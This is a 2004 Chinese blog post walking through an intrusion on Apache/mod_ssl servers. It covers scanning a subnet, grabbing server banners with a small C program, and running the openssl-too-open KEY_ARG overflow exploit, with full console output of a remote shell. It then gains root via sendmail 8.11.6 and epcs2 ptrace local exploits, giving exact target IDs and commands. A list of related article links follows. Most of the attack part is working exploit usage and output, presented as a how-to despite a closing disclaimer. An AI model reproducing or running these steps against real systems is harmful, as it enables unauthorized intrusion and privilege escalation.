apache_openssl漏洞的利用及权限的提升

原创 2004年09月07日 23:55:00

apache_openssl漏洞的利用及权限的提升

--nightcat
转载请保持文章完整

第一部分:获得shell.

在packetstorm玩了一段时间,遇到有openssl-too-open.tar.gz这个exploit.
现在看看软件包的描述:
OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes advantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability analysis

这个描述说明这个exploit 是openssl v 0.9.6的key_arg的漏洞来达到溢出的目的。不过也要
注意apache/mod_ssl的版本信息。对于大多数的有这样条件的都能溢出成功。取得一个id是
nobody shell,有些甚至是root的权限。软件包里面有一个扫描器,exploit。


好象听起来很诱人,down回来研究一下。
nightcat@nightcat$tar -zxvf openssl-too-open.tar.gz
nightcat@nightcat$cd openssl-too-open
Makefile? README? linux-x86.c? main.c? main.h? scanner.c? ssl2.c? ssl2.h

习惯性的要读一下软件包的REAMDE文件。
nightcat@nightcat$ more README
得到一些有用的信息:
1.编译的方法:
直接make就可以,之后就可以得到openssl-too-open和openssl-scanner

2.openssl-too-open的用法:
Usage: ./openssl-too-open [options]
? -a ????????? target architecture (default is 0x00)
? -p ????????? SSL port (default is 443)
? -c ???????????? open N apache connections before sending the shellcode (default is 30)
? -m ???????????? maximum number of open connections (default is 50)
? -v???????????????? verbose mode

Supported architectures:
??????? 0x00 - Gentoo (apache-1.3.24-r2)
??????? 0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
??????? 0x02 - Slackware 7.0 (apache-1.3.26)
??????? 0x03 - Slackware 8.1-stable (apache-1.3.26)
??????? 0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
??????? 0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
??????? 0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
??????? 0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
??????? 0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
??????? 0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
??????? 0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
??????? 0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
??????? 0x0c - SuSE Linux 7.0 (apache-1.3.12)
??????? 0x0d - SuSE Linux 7.1 (apache-1.3.17)
??????? 0x0e - SuSE Linux 7.2 (apache-1.3.19)
??????? 0x0f - SuSE Linux 7.3 (apache-1.3.20)
??????? 0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
??????? 0x11 - SuSE Linux 8.0 (apache-1.3.23)
??????? 0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
??????? 0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
??????? 0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
??????? 0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)

/****想成功,就要看准系统类型 和apache版本号
*****如果是 0x07 - RedHat Linux 7.0 (apache-1.3.12-25):
*****./epenssl-too-open -a 0x07 ip? .就应该可以啦!
****/

3.openssl-scanner的用法:
Usage: ./openssl-scanner [options]
? -i ???? file with target hosts
? -o ??? output log
? -a???????????????? append to output log (requires -o)
? -b???????????????? check for big endian servers
? -C???????????????? scan the entire class C network the host belogs to
? -d???????????????? debug mode
? -w N?????????????? connection timeout in seconds

Examples: ./openssl-scanner -d 192.168.0.1
????????? ./openssl-scanner -i hosts -o my.log -w 5
     ./openssl-scanner -C 192.168.0.0

/****扫描一个c类的ip
*****./openssl-scanner -C 192.168.0.0
****/

?

4.一个实现例子:

$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
? by Solar Eclipse <solareclipse@phreedom.org>

Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done

192.168.0.136: Vulnerable


$ nc 192.168.0.1 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html


./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
? by Solar Eclipse <solareclipse@phreedom.org>

: Opening 30 connections
? Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
? ssl0 : 0x810b3a0
? ssl1 : 0x810b360
? ssl2 : 0x810b4e0

* Addresses don't match.

: Opening 40 connections
? Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
? ssl0 : 0x8103830
? ssl1 : 0x80fd668
? ssl2 : 0x80fd668

* Addresses don't match.

: Opening 50 connections
? Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
? ssl0 : 0x8103830
? ssl1 : 0x8103830
? ssl2 : 0x8103830

: Sending shellcode
ciphers: 0x8103830?? start_addr: 0x8103770?? SHELLCODE_OFS: 184
? Reading tag
? Execution of stage1 shellcode succeeded, sending stage2
? Spawning shell...

bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
? 1:49pm? up? 4:26,? 1 user,? load average: 0.04, 0.07, 0.07
USER???? TTY????? FROM????????????? LOGIN@?? IDLE?? JCPU?? PCPU? WHAT
bash-2.05$


整个README 文件已经说的很明白了:
现在是总结一下实现的过程:
1.通过openssl-scanner来扫描一个c段的ip,找到有漏洞的主机,
2.用nc的方法查找banner得到三个目标内容:apache的版本号,openssl的版本号,操作系统版本3.在通过openssl-too-open来进行溢出得到一个shell.

其中第二步,我写个程序,可以方便得到banner.
/* the www banner scanner .80scanner version 1.0
?*
?* check for the enter ip or daemon to get the banner
?*
?*to complie:
?*user$gcc -o 80scaner 80scanner.c
?*
?*to use:
?*user$./80scanner somedomain.com (i.e. ./80scanner? antionline.com)
?*
?*coded by nightcat
?*march 2004
?*
?* */


#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include


int main(int argc,char *argv[])
{

int s;
struct in_addr addr;
struct sockaddr_in victem;
struct hostent *bad;
char buffer[1024];

if (argc!=2)
{
exit(printf("/nUsage:%s domain.com /n",argv[0]));
}

if ((bad=gethostbyname(argv[1]))==NULL)
{
exit(printf("Error getting hostname/n"));
}


printf("check? web server version/n");
printf("coded by nighcat/n");

system("sleep 2");

s=socket(AF_INET,SOCK_STREAM,0);
if(s<0) exit(printf("socket error/n"));

bcopy(bad->h_addr,(char *)&victem.sin_addr,bad->h_length);
victem.sin_family=AF_INET;
victem.sin_port=htons(80);

if(connect(s,(struct sockaddr*)&victem,sizeof(victem))<0)
{
exit(printf("connect error/n"));
}
printf("/ngetting http version/n/n");
send(s,"HEAD / HTTP/1.0/n/n",17,0);
recv(s,buffer,sizeof(buffer),0);
printf("version:/n%s",buffer);
close(s);

}
在linux简单编译。
nightcat@nightcat$./80banner? www.host.com(172.19.168.1)

第二部分:提升权限

? 我们的目的不是单单得到一个shell.而是得到root.到这里,我们已经了解了主机的系统类型
那好我们找一个local root exploit 就可以得到root.这类exploit实在太多。对于red hat
的系统,我介绍两个,
一个是sendmail的local root exploit:
1.漏洞说明:
/*
?* local exploit for sendmail 8.11.6
?* by sorbo (sorbox@yahoo.com)
?* http://www.darkircop.org
?*
?* This exploit takes advantage of the vulnerable prescan() function that
?* allows the user to input 0xff in order to skip the length check of the buffer.
?*
?* The vulnerability was found by Michal Zalewski
?*
?* The goal is to overwrite the 2 lsb of the saved frame pointer and make it
?* point to an area we control.
?*
?* We can overflow pvpbuf[] in parseaddr() (which calls prescan()) and overwrite
?* parseaddr's saved frame pointer.
?* When parseaddr() returns, the control is back to sendtolist() but the frame pointer
?* will be modified (we make it point to somewhere in pvpbuf).
?* We can't just fill pvpbuf with the ret value we want, since sendtolist() doesn't
?* exit right away, but instead makes use of some variables.
?* We need therefore to construct pvpbuf in an intelligent way, so references to variables
?* will be valid.
?* The first variable to set is delimptr (located at ebp - something).
?* We simply make this point to a 0, so the for loop exits.
?* The next variable to set is al (located at ebp - something ). We need to make a->q_next
?* point to 0 so the while loop exits. a->q_next is a+11*4.
?* The next variable is e (ebp + something). We make it point to a 0
?* The next variable is bufp (ebp - something). This needs to be equal to buf to skip the free.
?* This cannot be done since the address contains a 0xff and this cannot be input in pvpbuf.
?* We just make it point to a valid chunk (in our case... our fake chunk). We can't make it point
?* to stack since arena_for_ptr() will fail. Luckily our arguments get copied on the heap, so we
?* just point it to that.
?* Next we just set the ret (ebp + 4) to our shellcode and when sendtolist() exits our
?* shellcode will be executed. Note shellcode is even copied on heap, so non executable stacks will not
?* stop the exploit (the ret addr must match the shellcode location on the heap though)
?*
?* Note that if we overflow ebp by only one byte (putting a 0) i.e. the classical way
?* will not work since the register will not point to pvpbuf. What we do is overwrite two
?* bytes with 0x005c. Then we fill up the stack (by passing a long argument) so we lower the
?* address of pvpbuf untill it is in the range of the ebp. Also our shellcode will be at a low
?* stack address < 0xbffefefe (since we cannot write 0xff in pvpbuf).
?*
?* NOTE: sendmail 8.12.8 cannot be exploited this way since there is an assert() which cannot
?* be bypassed (in sendtolist()).
?*
?* have fun
?*
?* Greetz: Knight420, Stefano Biondi, nevez
?*
?只要利用prescan()函数长度检查问题

2.详细用法:
Local sendmail 8.11.6 exploit by sorbo (sorbox@yahoo.com)
Usage: ./sendmail
-h????? this lame message
-t????? target
-b????? brute force

Id????? Description???? pvpbuf????????? zero??????????? chunk?????????? shellcode addr
0)????? Slackware 8.0?? 0xbffdfef4????? 0xbffe15d6????? 0x80f30a0?????? 0xbffe1f36
1)????? Redhat 7.3????? 0xbffdfcd0????? 0xbffe19a6????? 0x80f30a0?????? 0xbffe1f36
2)????? Redhat 7.2????? 0xbffdfcd0????? 0xbffe19a6????? 0x80f30a0?????? 0xbffe1f36

如果是redhat7.2 简单执行:
./sendmail -b -t 2  就可以得到root.

?

另一个是epcs2.c:

/*
?* epcs2 (improved by lst [liquid@dqc.org])
?* ~~~~~~~
?* exploit for execve/ptrace race condition in Linux kernel up to 2.2.18
?*
?* originally by:
?* (c) 2001 Wojciech Purczynski / cliph / <wp@elzabsoft.pl>
?*
?* improved by:
?* lst [liquid@dqc.org]
?*
?* This sploit does _not_ use brute force. It does not need that.
?* It does only one attemt to sploit the race condition in execve.
?* Parent process waits for a context-switch that occur after
?* child task sleep in execve.
?*
?* It should work even on openwall-patched kernels (I haven't tested it).
?*
?* Compile it:
?*????? cc epcs.c -o epcs
?* Usage:
?*????? ./epcs [victim]
?*??????????
?* It gives instant root shell with any of a suid binaries.
?*
?* If it does not work, try use some methods to ensure that execve
?* would sleep while loading binary file into memory,
?*
?*????? i.e.: cat /usr/lib/* >/dev/null 2>&1
?*
?* Tested on RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4
?* This exploit does not work on 2.4.x because kernel won't set suid
?* privileges if user ptraces a binary.
?* But it is still exploitable on these kernels.
?*
?* Thanks to Bulba (he made me to take a look at this bug ;) )
?* Greetings to SigSegv team.
?*
?* -- d00t
?* improved by lst [liquid@dqc.org]
?* props to kevin for most of the work
?*
?* now works on stack non-exec systems with some neat trickery for the automated
?* method, ie. no need to find the bss segment via objdump
?*
?* particularly it now rewrites the code instruction sets in the
?* dynamic linker _start segment and continues execution from there.
?*
?* an aside, due to the fact that the code self-modified, it wouldnt work
?* quite correctly on a stack non-exec system without playing directly with
?* the bss segment (ie no regs.eip = regs.esp change).? this is much more
?* automated.? however, do note that the previous version did not trigger stack
?* non-exec warnings due to how it was operating.? note that the regs.eip = regs.esp
?* method will break on stack non-exec systems.
?*
?* as always.. enjoy.
?*
?*/
只要利用了execv/ptrace的条件竞选。
2.用法:
?* Usage:
?*????? ./epcs [victim]

这个的用法是可以直接执行:
./epcs 就可以得到root. 如果出现enjoy 那就说明可以得到。

?

第三部分:小结

/*****尽量多的了解你能了解的一切****/
要说的就是:
要明白你所利用的工具的功能,及了解为什么能这样利用。才是我们的真正目的。
入侵只是理解其中道理的一个方法,不要利用我介绍的东西,搞破坏,这个不是我
写文章的目的。

联系我:
qq:1043931
e-mail:ncnynl@hotmail.com

?

经验分享 | 通过adbd配置漏洞在安卓设备上提升权限

近日,Android上的一个本地提权漏洞已被确认,该漏洞可通过设备上运行的Android Debug Bridge Daemon(adbd)被利用。 如果一个安卓设备被发现正在运行于TCP端口监...
  • omnispace
  • omnispace
  • 2018-02-04 01:10:07
  • 238

在 Linux 下提升 bash 权限!

sudo bash command
  • Sun_Jianhua
  • Sun_Jianhua
  • 2004-07-04 14:14:00
  • 4604

OpenSSH 曝远程代码执行漏洞,尽快升级

导读 12月19日,国外漏洞平台 securityfocus上发布了最新的 OpenSSH(CVE-2016-10009)远程代码执行漏洞。由于问题出在ssh-agent,这个进程默认不启动、只...
  • looper66
  • looper66
  • 2016-12-23 17:55:45
  • 2063

Serv-U3.X-6.0本地权限提升漏洞的防御方案

出自:http://www.fineacer.comServ-U Ftp server(以下简称Serv-u)是一个应用比较广泛的Ftp Server(尤其是国内电信ISP、IDC等),功能强大,使用...
  • woolenhy
  • woolenhy
  • 2004-12-19 10:54:00
  • 1105

windows提升权限总结

  • 2009年06月04日 14:14
  • 47KB
  • 下载

SharePoint 权限提升的方法

普通方法 SPSecurity.RunWithElevatedPrivileges(delegate() { using (SPSite Site = new SPSite(SiteId))...
  • jason_dct
  • jason_dct
  • 2013-01-09 10:05:58
  • 1275

Web安全之权限攻击

权限攻击可以分为水平权限攻击和垂直权限攻击。水平权限攻击水平权限攻击,也叫作访问控制攻击。Web应用程序接收到用户请求,修改某条数据时,没有判断数据的所属人,或者在判断数据所属人时从用户提交的表单参数...
  • mevicky
  • mevicky
  • 2015-09-08 10:33:33
  • 4083

DISCUZ漏洞与提升权限

DISCUZ漏洞与提升权限这个漏洞是孟兄发现的,我在这里感谢他!也感谢ANGEL的分析!DISCUZ 2.2F的这个漏洞在register.php 的代码中:有如下代码: $email = trim(...
  • dcboy
  • dcboy
  • 2004-12-17 16:30:00
  • 3424

如何快速利用s02-45漏洞获取服务器权限

原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://simeon.blog.51cto.com/18680/1904351 ...
  • qq_34841823
  • qq_34841823
  • 2017-03-13 11:35:57
  • 779

【技术分享】CVE-2016-6662:Mysql远程代码执行/权限提升技术分析正式版(9/13 10:47更新)

【技术分享】CVE-2016-6662:Mysql远程代码执行/权限提升技术分析正式版(9/13 10:47更新) 作者:苦逼司马(凌晨四点收到投稿,...
  • qq_27446553
  • qq_27446553
  • 2016-09-14 08:49:44
  • 2054
收藏助手
不良信息举报
您举报文章:apache_openssl漏洞的利用及权限的提升
举报原因:
原因补充:

(最多只允许输入30个字)